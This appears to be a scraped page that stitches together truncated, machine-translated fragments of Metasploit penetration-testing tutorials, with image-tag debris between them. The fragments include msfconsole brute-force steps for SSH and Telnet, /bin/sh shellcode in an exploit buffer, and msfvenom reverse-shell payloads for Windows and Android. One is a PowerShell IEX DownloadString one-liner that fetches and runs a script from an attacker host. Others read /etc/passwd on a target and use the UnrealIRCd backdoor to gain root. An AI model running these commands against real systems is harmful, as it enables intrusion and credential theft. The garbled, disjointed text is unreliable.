Transferred from: Tsinghua-Zhuge Jian Wei
1. Format requirements: Flash format, screenshot screen video demo2. Post-processing: magnifying effect/explanatory annotation; with narration recording
3. Each case study divides into the environment preparation, the infiltration utilization and the flaw analysis three video demo, the concrete process:
(a) Environmental preparation processI. Environmental interpretation1. Attack aircraft environment (using which attacks software, such as
MSF > DB_CONNECT-Y/opt/metasploit/apps/pro/ui/config/database.yml MSF connectivity database[*] Rebuilding the module cache in the background ...MSF > Db_status View Database Connection status[*] PostgreSQL connected to MSF3MSF > Use auxiliary/scanner/mysql/mysql_login load scan moduleMSF auxiliary (mysql_login) > Set RHOSTS 1.5.5.3 Destination IP addressRHOSTS = 1.5.5.3MSF auxiliary (mysql_login) > set USERNAME root target user name is typically rootU
As we all know, when conducting penetration testing under MSF, the results data can be saved to the database, allowing individual team members to synchronize data during penetration testing.For example, Metasploit provides the Db_nmap command, which allows the Nmap scan results to be stored directly in the database, and also provides a db_import command to support the import of scan results from up to 20 scans.Metasploit supports a variety of database
ObjectiveWhen you perform some action on the victim's machine, you find that some actions are denied, and in order to get full access to the victim machine, you need to bypass the restrictions and get some permissions that are not already available, which can be used to delete files, view private information, or install special programs such as viruses. Metasploit has a number of post-infiltration methods that can be used to bypass permissions on the
The Oracle Attack Module in metasploit is incomplete by default. You need to do some work on your own. This article mainly records some errors in the setup environment (operating system backtrack 5 ). By default, some attack functions of Oracle may encounter the following error: ary module execution completed
MSF>Use auxiliary/admin/Oracle/oracle_login
MSF auxiliary (oracle_login)>Set rHost 192.168.0.91
RH
The latest version of Metasploit is 4.0 and can be downloaded directly from the official website (www.metasploit.com) because it is open source, so it's free.Metasploit is very good and powerful, integrates more than 700 kinds of exploit, but if the operating system is full of patches, it is still difficult to invade, so in order to test, choose the oldest version of Windows XP, is not with any SPX patch, or you can choose Windows XP SP1 version, the
Step 1:
Download the metasploitinstallation package from the official website http://www.metasploit.com/
Step 2:
Disable anti-virus software and firewall on your host
Step 3:
For Windows 7, go to Control Panel> region and language> area and change the area to English (us ). Otherwise, an error occurs during PostgreSQL installation and the installation may fail.
Step 4:
Double-click the downloaded Installation File to install it by default. Some may want to change the installation di
---restore content starts---MSF > Show ExploitsAll available penetration testing frameworks for column Metasploip. In the MSF terminal, appropriate penetration attacks can be implemented against the security vulnerabilities found in penetration testing.MSF > show AuxiliaryList all the auxiliary modules and their purpose.MSF > Show OptionsThe settings required to ensure that each module in the Metasploit framework is running correctly.For example: When
KaLi Connecting the PostgreSQL databaseTo see if PostgreSQL is up and not started, start with the service PostgreSQL Start command. After starting to see if the boot was successful, the port is 5432:650) this.width=650; "src=" http://s3.51cto.com/wyfs02/M00/4C/7F/wKioL1Q-kgaSWeZXAAC1T1E06QE255.jpg "title=" 34.png "alt=" Wkiol1q-kgaswezxaac1t1e06qe255.jpg "/>After starting Metasploit, check the connection status of PostgreSQL, the command is: Db_status
}Second, we payload first to use the first validated run/bin/sh shellcode#Build the buffer for transmissionbuf=""; BUF = Make_nops ();buf+="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"buf+="\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"buf+="\x80\xe8\xdc\xff\xff\xff/bin/sh"; #buf+= "\XA4\XF4\XFF\XBF" #buf + = payload.encodedBUF + = [].fill (target.ret,0,100). Pack ('v*')In particular, note that the number of NOP instructions We added last time is 15
Password Code blasting moduleBlasting SSH service password guessing most of them are search SSH under Linux this time we can see a lot of search ssh_login find a dictionaryUse Auxiliary/scanner/ssh/ssh_loginShow Optionsset RHOST IP address set pass_file passset USERNAME rootexploitThe operation of the other services below it is the same, not one operation.Demolition hack telnet slow search telnet_loginuse auxiliary/scanner/telnet/telnet_loginshow opiotnsset RHOST ipset pass_file Passset USERNAME
=" Wkiol1hki0za_vcjaabbeoqv9pi188.jpg "/>1.11 Enter "CD Rootfs" in the terminal, enter the Rootfs directory, enter the command "LS" under Terminal to list the directory.1.12 Enter "MORE/ETC/PASSWD" in the terminal to view the password in the target host system.650) this.width=650; "src=" http://s1.51cto.com/wyfs02/M02/8B/58/wKiom1hKI03yl_DnAACw2l6usRw373.jpg "style=" float: none; "title=" 5.jpg "alt=" Wkiom1hki03yl_dnaacw2l6usrw373.jpg "/>650) this.width=650; "src=" http://s4.51cto.com/wyfs02/M0
Metasploit Overflow UNREALIRCD Backdoor VulnerabilityUse the UNREALIRCD backdoor vulnerability to obtain root permissions for the target host.The unrealircd of some sites, in which Debug3_dolog_system macros contain externally introduced malicious code, allows remote attackers to execute arbitrary code.First, using the Nmap tool to scan the target hostThe 1.1 uses the Nmap command to scan the target host. Click on the left side of the desktop and sel
There are many exploits in the Metasploit framework, including buffer overflows, browser exploits, Web application vulnerabilities, Backdoor exploits, Zombie takeover tools, and More. Exploit developers and people who have contributed to this framework have shared a lot of interesting and useful things.
First, use Msfvenom to generate PS1 files:Msfvenom-p windows/x64/meterpreter/reverse_tcp lhost=192.168. 217.162 lport=7788 -F psh-reflection >7788. PS1Second, open MSF monitoring: use exploit/multi/> Set payload windows/x64/meterpreter/= windows/meterpreter/ > Set lhost xxx.xxx.xxx. = = xxx.xxx.xxx. >=> RunSecond, execute the CMD command on the target machine:" IEX (New-object net.webclient). Downloadstring (' Http://192.168.217.162/7788.ps1 '); Xx.ps1"Note whether the target and system are 3
First I build an Android app under Kali, that is, the APK format file, the command used is:Msfvenom-p android/meterpreter/reverse_tcp lhost= Local IP lport= listening port R >/root/rb.apkNote:-P: Refers to the payload used in this environment, the payload is the successful Android attack after the rebound connection sent to the attacker's terminal;Lhoost and Lport refer to the local bounce IP address and the local listening port;-r: Indicates the type of file to be generated;>/root/rb.apk: Indic
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.